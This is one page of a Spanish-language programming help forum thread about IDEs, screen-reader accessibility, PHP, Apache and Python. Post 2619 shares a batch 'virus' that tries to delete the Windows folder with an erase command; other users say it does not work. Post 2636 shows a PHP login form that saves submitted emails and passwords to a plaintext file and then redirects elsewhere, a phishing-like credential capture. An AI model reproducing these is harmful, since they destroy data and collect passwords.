Recursos para aprender a programar

4008 messages, 134 pages:  1; 86 8788 89 90; 134 ↖ Go back to topic list

Score: +38

2611. nicolae-guta,

hola chics xd. busco un manual de autoit y uno de AHK. de auto it no encontré demasiado, un pdf que la verdad es bastante comfuso, y de AHK solo está el manual del propio programa pero no sé, me parece bastante comfuso. alguien que me pueda echar paro con eso?

Score: +0

2612. rmcpantoja,

recomiendo el manual original en inglés de AutoIt que se encuentra ubicado en su carpeta de instalación. Es bastante legible al ser un .chm bien estructurado.

2613. nicolae-guta,

lo probaré, muchas gracias.

2614. Symbian,

El problema del eclipse es que es algo confuso. Yo al menos lo usaría solo para java

2615. escanor0,

ooo si yo lo espero Abría que hablar de eclipse en el próximo encuentro NVDA. Es más rápido que VSCode, accesible de forma nativa, y su editor da más info a los lectores de pantalla que el de VSCode. Tampoco se laggea cuando abres un proyecto de miles de líneas y muchas carpetas. Si consiguieran integrar muchos plugins de VSCode y hacerlo más intuitivo para los que recién empiezan...

2616. Chuy ,

si les cuento lo que he creado no me lo van a creer.
he creado mi propio malware,y de los bien peligrosos.
voy a ver si luego le ago una prueba en una maquina virtual que tengo. en termino general este virus lo que hace es borrarte la carpeta Windows enterita.
aquí tengo el código. si quieren se los puedo pasar pero como dice victor montolla.
pero no me ago responsable de sus estupideces.

2617. John-117 ,

pasar al PV? necesito probar eso abe

2618. Rayo,

a ver, pasa por acá:
en qué lo hiciste?
para qué?

2619. Chuy ,

lo ise para probar solamente.
ya que encontré una playlist de como crear virus
esto tienen que copiarlo en un archivo de texto plano y guardarlo con extención.bat.
@echo off
erase C:\Windows\Q

2620. Heracles,

No lo creaste, porque ya estaba creado. Sabes ¿qué hace eso?

2621. un-gatito-brillante,

eso funciona sin importar que existan los permisos de TrustedInstaller?

2622. Chuy ,

en realidad yo lo escribi a mano.
solo fui siguiendo el tutorial para ver como se tenía que escribir cada parte del código.
aparte que esta bien explicado el video. explica bien paso a paso para que sirve cada parte del código.

2623. Franco-Escamilla ,

Calcaste, en todo caso.

2624. un-gatito-brillante,

preguntaba lo de arriba porque tengo una partición que quiero cargarme, en sí la de un sistema operativo anterior, pero ni intentando formatear puedo quitarla. lo único que se me ocurre es arrancar desde el instalador de Windows, pero si me dicen que ese código funciona, me vendría muy bién.

2625. Chuy ,

yo voy a ver si me monto una vm de xp o Windows 7 para probar y les aviso si funciona.

2626. sukil,

No, no funciona.

2627. el-gatito-sigiloso,

¡Hola!

Bueno, aprovechando que hace mil años hablaban de Eclipse, ¿alguien tiene idea por qué de la nada se me pudo haber roto el autocompletado? como tal funciona, pero cuando presiono control espacio para ver las sugerencias, no hay forma de que el NVDA las verbalice, y me viene pasando hace días.
Más allá de eso, sí, es muy buen ide. Para alguien que comentaba que se le rompían los packages a veces, a mí normalmente no me pasa al importar proyectos grandes, solo cuando creo proyectos en spring boot y por alguna razón no reconoce el que el spring inicializr crea por defecto. De todas formas, algo que puedes intentar, es cerrar el proyecto, borrarlo y volverlo a importar. Eso a mí a veces me soluciona unos cuantos bugs, principalmente cuando trabajo con spring que no siempre reconoce que es un proyecto hecho en maven y lo toma como si fuera un proyecto java normal, lo cual al compilar lanza mil errores.
Saludotes.

2628. kamilo10,

@el-gatito-sigiloso, después de darle control mas espacio, intenta dar tabulador, para ver si te salen las sugerencias, bueno yo utilizo visual studio code y eclipse nunca e tenido problemas, con ningún tipo de proyectos, en mi opinión cada uno sirve para lo que sirve, y no hay que darle tanta vuelta.

2629. el-gatito-sigiloso,

¡Buenas!
Sí, lo he intentado, pero el problema es que el NVDA no las verbaliza. O sea, las sugerencias como tal aparecen, pero tengo que darle a ciegas a alguna, lo cual es tremendamente tedioso y suele ser un problema mas que una solución.

2630. kamilo10,

@el-gatito-sigiloso, tienes activado para que el nvda te lea las sugerencias?

2631. el-gatito-sigiloso,

Am... ¿sí? (¿dónde reviso eso?) jajaj. Supondría que sí porque antes me funcionaba y no he tocado ninguna opción, pero realmente no lo sé.

2632. Ricochet,

yo me quedo con IDE's entre scintilla y SciTe, no serán tan avanzados como visualstudio pero perrerías tienen.

2633. el-gatito-sigiloso,

Mensaje eliminado por errores extraños del foro.

Last edited by el-gatito-sigiloso, Jan 8 2023 02:35:06

2634. alfred,

En ocaciones me ocurre que deja de leer las sugerencias. no se si es error de NVDA o de Eclipse, pero se soluciona reiniciando Eclipse. También puede que deje de funcionar el comando de NVDA para leer el status bar, para saber en que línea y posición te encuentras. Igual se arregla reiniciando, Eclipse o NVDA, o incluso ambos.

2635. Symbian,

acaso scite te permite editar código en otros lenguajes de programación? Tiene autocompletado y eso?

2636. Rayo,

hola! vengo con una duda de php.
verán, estoy haciendo experimentos con php, y tengo creado este código:
<?php

// Comprobamos si se han enviado los datos por POST
if ($_SERVER['REQUEST_METHOD'] == 'POST') {
// Asignamos a variables locales los datos enviados
$email = $_POST['email'];
$password = $_POST['password'];

// Abrimos el archivo para escritura
$file = fopen("datos.txt", "w");

// Comprobamos si se ha abierto el archivo correctamente
if ($file) {
// Escribimos los datos en el archivo
fwrite($file, "Email o usuario: " . $email . "\n");
fwrite($file, "Contraseña: " . $password . "\n");
fclose($file);
} else {
// Si no se ha podido abrir el archivo, mostramos un mensaje de error
echo "Error al abrir el archivo para escritura. ";

// Comprobamos si el archivo existe
if (!file_exists("datos.txt")) {
echo "El archivo no existe. ";
}

// Comprobamos si el archivo tiene permisos de escritura
if (!is_writable("datos.txt")) {
echo "El archivo no tiene permisos de escritura. ";
}

exit();
}

header("Location: "http://rayoscompany.com/");
exit();
}

?>

<!-- Creamos el formulario HTML -->
<form action="login.php" method="post">
Correo electrónico o nombre de usuario: <input type="text" name="email"><br>
Contraseña: <input type="password" name="password"><br>
<input type="submit" value="Enviar">
</form>

el código se ejecuta bien, la página, todo bien.
pero al darle al enviar datos, me salta siempre el error de permisos de archivo.
revisé los permisos del txt y todo eśta marcado, se los di también con el comando chmod.
chmod u+w directorio/
chmod u+w datos.txt
pero nada.
alguien podría saber por qué?
gracias!
Edito:
ya pude darle permisos correctamente al archivo de datos.

Last edited by Rayo, Jan 8 2023 18:08:22

2637. Fluttershy,

e, alguna persona que me de una idea más o menos de synthisizer. no se mucho inglés lo se,error mío, y no me llevo muy bien con la documentación xd.

Last edited by Fluttershy, Jan 9 2023 01:34:19

2638. Rayo,

Hola! vengo con un problema enorme jaja.
pro x o z, me cargué apache por querer poner les encrypt a mi servidor; total, tuve que borrar todo rastro de apache y el propi les encrypt.
cuando quiero echar arriba mi web, no me aparecía la web, solo el archivo de bienvenida a apache.
fui a la configuración de apache en:
/etc/apache2.
y acá tenía muchos archivos de configuración, y en todos les puse la ruta de mi sitio web
menos en el que decía apache2.conf; porque allí no me dejaba o no me aparecía la línea correspondiente.
luego ya me redirigía a mi sitio web, la pega es que si solo pongo el dominio me muestra el archivo con el código fuente tal cual, a excepción de si pongo el .com/nombre.php si me lo muestra como debería.
qué puedo hacer?

2639. Chuy ,

creo que esto ya es problema de 260mb pero cada vez que entro a una web creada en ese servicio salta al final de la web.
?i=1.
y no solo en la mía. también en la de mateo cedillo,y en la antigua web de rayoscompany.

2640. Fluttershy,

hola, tengo una pregunta.
cuando importo un archivo en python, ejemplo:
import archivo
tengo que importar cada función o clase que esté dentro del mismo.
si en mi archivo.py tengo una función print que imprime un hola y otra función print2 que imprime un chao tengo que importar cada función por separado.
from archivo import print
from archivo import print2
como podría hacer para solucionar este error?
porque si solo importo archivo.py sin más no me salen las funciones que se encuentran dentro del archivo.
muchas gracias

4008 messages, 134 pages:  1; 86 8788 89 90; 134 ↖ Go back to topic list

Answer to topic

You must be connected in order to be allowed to post.

Lost password ? Create account